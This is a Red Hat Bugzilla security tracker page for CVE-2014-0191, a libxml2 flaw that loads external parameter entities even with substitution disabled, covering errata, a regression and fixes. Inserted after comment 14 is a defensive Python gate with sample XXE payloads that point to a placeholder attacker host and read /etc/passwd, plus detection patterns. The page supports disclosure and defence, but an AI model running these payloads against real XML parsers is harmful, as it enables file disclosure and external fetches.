Bug 1090976 - (CVE-2014-0191) CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled
Status: CLOSED ERRATA
Product: Security Response
Classification: Other
Component: vulnerability (Show other bugs)
Version: unspecified
Hardware/OS: All Linux
Priority: medium  Severity: medium
Assigned To: Red Hat Product Security
impact=moderate,public=20140506,repor...
Keywords: Security
Depends On: 1093090 1093091 1107556 1107557 1191425 1195649 1195650
Blocks: 1086699 1090982
Reported: 2014-04-24 09:59 EDT by Stefan Cornelius
Modified: 2015-11-25 05:04 EST (History)
Fixed In Version: libxml2 2.9.2
Doc Type: Bug Fix
Doc Text:
It was discovered that libxml2 loaded external parameter entities even when entity substitution was disabled. A remote attacker able to provide a specially crafted XML file to an application linked against libxml2 could use this flaw to conduct XML External Entity (XXE) attacks, possibly resulting in a denial of service or an information leak on the system.
Last Closed: 2015-03-30 07:56:10 EDT
Description Stefan Cornelius 2014-04-24 09:59:12 EDT
It was discovered that libxml2, a library providing support to read, modify and write XML files, incorrectly performs entity substitution in the doctype prolog, even if the application using libxml2 disabled any entity substitution. A remote attacker could provide a specially-crafted XML file that, when processed, would lead to the exhaustion of CPU and memory resources or file descriptors.
Comment 1 Stefan Cornelius 2014-04-24 10:09:41 EDT
Acknowledgements:

This issue was discovered by Daniel P. Berrange of Red Hat.
Comment 13 Stefan Cornelius 2014-05-06 11:56:38 EDT
Public via:
http://www.openwall.com/lists/oss-security/2014/05/06/4
Comment 14 Tomas Hoger 2014-05-06 15:01:23 EDT
This issue is related to the handling of external parameter entities.  Even when libxml2 was instructed to parse an XML document without performing entity substitutions (i.e. when the parser was run without the XML_PARSE_NOENT option, which is the default), libxml2 loaded external entities, which could lead to some XML eXternal Entities (XXE) attacks.

A similar problem was previously corrected in libxml2 for general entities via:
https://git.gnome.org/browse/libxml2/commit/?id=4629ee02ac649c27f9c0cf98ba017c6b5526070f
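The two entity flavours distinguished in comment 14 (general entities, fixed by the earlier commit, and parameter entities, the subject of this CVE) are easiest to see side by side. What follows is an added example, not code from libxml2 and not from anyone in this report: a Python gate using only the standard library that an application can run over untrusted input before handing it to any XML parser, so that blocking external loads does not depend on the library's NOENT default behaving correctly. The sample documents and the host attacker.example are constructed for the example.

```python
"""Pre-parse gate that refuses XML whose DOCTYPE could make a parser fetch
anything external: an external DTD subset, external general entities, or
external parameter entities (the vector behind CVE-2014-0191).

Added example, not code from libxml2 or from the bug report. It uses only the
Python standard library; the sample documents below are constructed."""
import re
import xml.etree.ElementTree as ET

# Constructed samples (attacker.example is a placeholder host).
PARAMETER_ENTITY_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY % ext SYSTEM "http://attacker.example/evil.dtd">
  %ext;
]>
<doc>hello</doc>"""

GENERAL_ENTITY_XXE = b"""<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<doc>&xxe;</doc>"""

EXTERNAL_SUBSET = b'<!DOCTYPE doc SYSTEM "http://attacker.example/evil.dtd"><doc/>'

INTERNAL_ONLY = b"""<?xml version="1.0"?>
<!DOCTYPE doc [ <!ENTITY greeting "hello"> ]>
<doc>&greeting;</doc>"""

NO_DOCTYPE = b"<doc>plain</doc>"

# Keyword matching is case-insensitive on purpose: the XML spec requires
# uppercase SYSTEM/PUBLIC, so being lax here can only add false positives.
DOCTYPE_EXTERNAL = re.compile(r'<!DOCTYPE\s+[^\s\[>]+\s*(SYSTEM|PUBLIC)\b', re.I)
ENTITY_DECL = re.compile(
    r'<!ENTITY\s+(?P<pe>%\s+)?(?P<name>[^\s"\'>]+)\s+(SYSTEM|PUBLIC)\b', re.I)
PE_REFERENCE = re.compile(r'%[^\s;%]+;')
QUOTED = re.compile(r'"[^"]*"|\'[^\']*\'')


def _as_text(data):
    return data.decode("utf-8", "replace") if isinstance(data, bytes) else data


def _doctype_span(text):
    """(start, end) of the DOCTYPE declaration, or None. Quoted literals and
    the [...] internal subset are skipped so a '>' inside them does not end it."""
    m = re.search(r"<!DOCTYPE\b", text)
    if not m:
        return None
    depth, quote = 0, None
    for i in range(m.end(), len(text)):
        c = text[i]
        if quote:
            quote = None if c == quote else quote
        elif c in "\"'":
            quote = c
        elif c == "[":
            depth += 1
        elif c == "]":
            depth -= 1
        elif c == ">" and depth == 0:
            return m.start(), i + 1
    return m.start(), len(text)  # unterminated: treat the rest as DOCTYPE


def find_external_references(data):
    """List every construct in the DOCTYPE that can trigger an external load."""
    text = _as_text(data)
    span = _doctype_span(text)
    if span is None:
        return []
    dt = text[span[0]:span[1]]
    findings = []
    if DOCTYPE_EXTERNAL.search(dt):
        findings.append("external-dtd-subset")
    for m in ENTITY_DECL.finditer(dt):
        kind = "external-parameter-entity" if m.group("pe") else "external-general-entity"
        findings.append(kind + ":" + m.group("name"))
    # %name; references pull in (possibly external) parameter entities; look
    # for them outside quoted literals only.
    for m in PE_REFERENCE.finditer(QUOTED.sub('""', dt)):
        findings.append("parameter-entity-reference:" + m.group(0))
    return findings


def parse_untrusted(data, allow_doctype=False):
    """Reject documents the gate flags, then parse. By default any DOCTYPE is
    refused, which also shuts the door on internal-entity expansion bombs."""
    text = _as_text(data)
    findings = find_external_references(text)
    if findings:
        raise ValueError("rejected: " + ", ".join(findings))
    if not allow_doctype and _doctype_span(text) is not None:
        raise ValueError("rejected: DOCTYPE not permitted")
    return ET.fromstring(text)


if __name__ == "__main__":
    for name, doc in [("parameter entity", PARAMETER_ENTITY_XXE),
                      ("general entity", GENERAL_ENTITY_XXE),
                      ("external subset", EXTERNAL_SUBSET),
                      ("internal only", INTERNAL_ONLY)]:
        print(name, "->", find_external_references(doc) or "no external loads")
```

Run stand-alone it prints the findings for each sample; the parameter-entity document is flagged twice, once for the external declaration and once for the `%ext;` reference that would pull it in. With libxml2 itself the complementary settings are to leave XML_PARSE_NOENT and XML_PARSE_DTDLOAD unset, set XML_PARSE_NONET, and install a refusing loader with xmlSetExternalEntityLoader(); the gate above is the layer that holds regardless of which libxml2 version is linked.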
Comment 21 errata-xmlrpc 2014-05-19 07:13:33 EDT
This issue has been addressed in following products:

  Red Hat Enterprise Linux 6

Via RHSA-2014:0513 https://rhn.redhat.com/errata/RHSA-2014-0513.html
Comment 22 Vincent Danen 2014-06-09 13:22:20 EDT
Ubuntu just released http://www.ubuntu.com/usn/usn-2214-2/ to note a regression in the upstream fix for this issue, described as:

"""
USN-2214-1 fixed vulnerabilities in libxml2. The upstream fix introduced a
regression when using xmllint with the --postvalid option. This update
fixes the problem.
"""

Given that we have fixed in RHEL6, do we suffer from the same regression?  See also https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/1321869 and https://mail.gnome.org/archives/xml/2014-May/msg00002.html which contains a patch attached (presumably what was used in Ubuntu); also see the upstream report here:

https://bugzilla.gnome.org/show_bug.cgi?id=730290
Comment 23 Michael Chapman 2014-06-09 20:05:32 EDT
Vincent
Comment 24 Michael Chapman 2014-06-09 20:06:07 EDT
Vincent, I think we do have the same regression. See https://bugzilla.redhat.com/show_bug.cgi?id=1104864 .
Comment 25 Stefan Cornelius 2014-06-10 04:00:40 EDT
Created libxml2 tracking bugs for this issue:

Affects: fedora-all [bug 1107556]
Comment 26 Stefan Cornelius 2014-06-10 04:00:44 EDT
Created mingw-libxml2 tracking bugs for this issue:

Affects: fedora-all [bug 1107557]
Comment 27 Stefan Cornelius 2014-06-10 04:09:21 EDT
(In reply to Vincent Danen from comment #22)
> Given that we have fixed in RHEL6, do we suffer from the same regression? 
> See also https://bugs.launchpad.net/ubuntu/+source/libxml2/+bug/1321869 and
> https://mail.gnome.org/archives/xml/2014-May/msg00002.html which contains a
> patch attached (presumably what was used in Ubuntu); also see the upstream
> report here:
> 
> https://bugzilla.gnome.org/show_bug.cgi?id=730290

This is a bug we've introduced with this security patch, but from what I can tell it's not a new security issue. As Michael Chapman pointed out in comment 24, this is already being handled in bug 1104864.
Comment 28 Vincent Danen 2014-06-17 12:02:34 EDT
Statement:

Red Hat Enterprise Linux 5 is now in Production 3 Phase of the support and maintenance life cycle. This has been rated as having Moderate security impact and is not currently planned to be addressed in future updates. For additional information, refer to the Red Hat Enterprise Linux Life Cycle: https://access.redhat.com/support/policy/updates/errata/.
Comment 29 Tomas Hoger 2015-02-11 05:23:16 EST
Created mingw32-libxml2 tracking bugs for this issue:

Affects: epel-7 [bug 1191425]
Comment 30 Tomas Hoger 2015-02-11 05:25:40 EST
Bug 915149 comment 8 has notes on related issue that affected general external entities.
Comment 32 errata-xmlrpc 2015-03-30 02:18:06 EDT
This issue has been addressed in the following products:

  Red Hat Enterprise Linux 7

Via RHSA-2015:0749 https://rhn.redhat.com/errata/RHSA-2015-0749.html
Comment 34 Fedora Update System 2015-04-07 03:30:12 EDT
libxml2-2.9.1-7.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 35 Fedora Update System 2015-04-11 05:07:31 EDT
libxml2-2.9.1-4.fc20 has been pushed to the Fedora 20 stable repository.  If problems still persist, please make note of it in this bug report.